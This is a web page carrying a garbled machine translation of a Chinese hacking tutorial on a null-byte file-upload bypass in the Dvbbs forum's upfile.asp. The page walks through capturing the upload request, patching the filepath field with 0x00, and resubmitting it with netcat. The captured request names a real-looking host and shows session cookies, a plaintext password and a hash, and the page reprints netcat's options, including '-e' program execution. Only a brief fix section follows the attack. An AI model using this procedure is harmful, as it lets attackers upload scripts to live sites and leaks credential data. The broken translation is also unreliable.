PHP/ASP Upload vulnerability inquiry _ PHP Tutorial

Source: Internet
Author: User
PHPASP Upload vulnerability exploration. 1: The transfer vulnerability is used only for asp and php scripts uploaded in form format. *** nc (netcat) is used to submit data packets. run the following command on the dos interface: nc-vvwww. ***. com802: vulnerability principle Example 1: The transfer vulnerability is used only for asp and php scripts uploaded in form format. *** nc (netcat) is used to submit data packets for running on the dos interface: nc-vv www. ***. com 80 <1.txt-vv: Echo 80: www Port 1.txt: is the data packet you want to send (for more usage, see this post) wse (wsockexpert) monitors local ports and captures packets submitted by ie
2: vulnerability principle the following example assumes the premise of www host: www. ***. com; bbs path:/bbs/The vulnerability is due to the study of file uploading through the dynamic network. we recommend you have some programming experience to see the upfile of dvbbs. asp file, you do not need to fully understand that upfile is uploaded by generating a form table, the following variables are used: filepath default value uploadface attribute hiden act default value upload attribute hiden file1 is the key to the file to be uploaded is the filepath variable! By default, our files are uploaded to www. ***. the com/bbs/uploadface/file is named after the upload time, that is, the filename = formpath & year (now) & month (now) in the upfile) & day (now) & hour (now) & minute (now) & second (now) & rannum &". "& fileext ------------------------------------ we know that the data in the computer is" "for Peugeot, who have used C language knows that char data [] =" bbs ", the data array length is 4: B s what if we construct filepath as follows? Filepath = "/newmm. asp" when the file we uploaded in 4.09.242.168.24 is changed but not changed: _ blank> http://www . ***. Com/bbs/uploadface/200409240).jpg: _ blank> http://www . ***. Com/newmm. asp/2004092402.16.jpg. when the server receives filepath data, newmm is detected. after asp, it is understood that the data in filepath has ended the file we uploaded, such as c :. asp is saved as follows: _ blank> http://www . ***. Com/newmm. asp 3, however, filepath filtering and processing are not good. many websites only add nhidenode changes to upfile.exe on the public network. this is the upload vulnerability exploitation tool or filepath variable exploitation tool (Veteran's )... but the most basic thing is not changed .. There are similar vulnerabilities in website plug-ins. I would like to say that I should not rely on specialized tools to modify the filepath variable in the package caught by wse, and then submit it using nc... Even if he adds n hiden variables, it does not help. Of course, if we strictly filter filepath, these theories will end when our new theory was born! 4: Detailed example: --------------------- one-second wsepacket (saved to 1.txt): post/bbs/upphoto/upfile. asp http/1.1 accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, */* referer: _ blank> http://www Export accept-language: zh-cn content-type: multipart/form-data; boundary = ----------- 7d423a138d0278 accept-encoding: gzip, deflate user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1 ;. net clr 1.1.4322) host: _ blank> www.xin126.com content-length: 1969 connection: keep-alive cache-control: no-cache cookie: aspsessionidaccccdcs = njhcphpalbcankobechkjanf; iscome = 1; Gamvancookies = 1; regtime = 2004% 2d9% 2d24 + 3% 3a39% 3a37; username = szjwwwww; pass = 5211314; dl = 0; userid = 62; ltstyle = 0; logintry = 1; userpass = eb03f6c72908fd84 ----------------------------- 7d423a138d0278 content-disposition: form-data; name = "filepath ".. /medias/myphoto/--------------------------- 7d423a138d0278 ...... upload --------------- 7d423a138d0278 ----------------- 、ultraeditopen 1.txt to change the data :...... ----- ------------------------ 7d423a138d0278 content-disposition: form-data; name = "filepath"/newmm. asp margin <= This black represents a space of 0x20. change it to 0x00 ...... -------------------------- 3. recalculate the cookie length, and then nc submits nc-vv _ blank> www.xin126.com 80 <1.txt ultraedit. it is a 16-bit editor which can be downloaded from the internet. We mainly use it to write the ending Peugeot: ====> 16 bits indicate: 0x00 or 00 h. In fact, when you change the value, add a 00 at the end of the filepath to calculate the cookie length ==> after you change the fillepath, it must be or + or-the cookie length has changed ...... host: _ blank> www. x In126.com content-length: 1969 <===== is this connection: keep-alive cache-control: no-cache ...... will it be computed? A letter or number is the solution to the upload vulnerability: (for reference only) 1. Generally, the upload path is treated as a variable ==> Our countermeasure is to change filepath to a constant... This method is currently the most effective (I think) 2. enhance the processing of the statement. it turns out that when we read it here, we will end the process where we continue to read the next variable, processing is OK. attachment: NC Usage: listening to external host nc [-options] hostname port [s] [ports]... listen to the local host nc-l-p port [options] [hostname] [port] options:-d detach from console, stealth mode-e prog inbound program to exec [dangerous!] -G gateway source-routing hop point [s], up to 8-g num source-routing pointer: 4, 8, 12 ,... -h this cruft-I secs delay interval for lines sent, ports scanned-l listen mode, for inbound connects-l listen harder, re-listen on socket close-n numeric-only ip addresses, no dns-o file hex dump of traffic-p port local port number-r randomize local and remote ports-s addr local source address-t answer telnet negotiation-u udp mode-v verbose [use twice to be more verbose]-w secs timeout for connects and final net reads-z zero-I/o mode [used for scanning] port numbers can be inpidual or ranges: m-n [random sive]

Nc (netcat) is used to submit data packets to run on the dos interface: nc-vv www. ***. com 80 2: vulnerability principle example below...

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.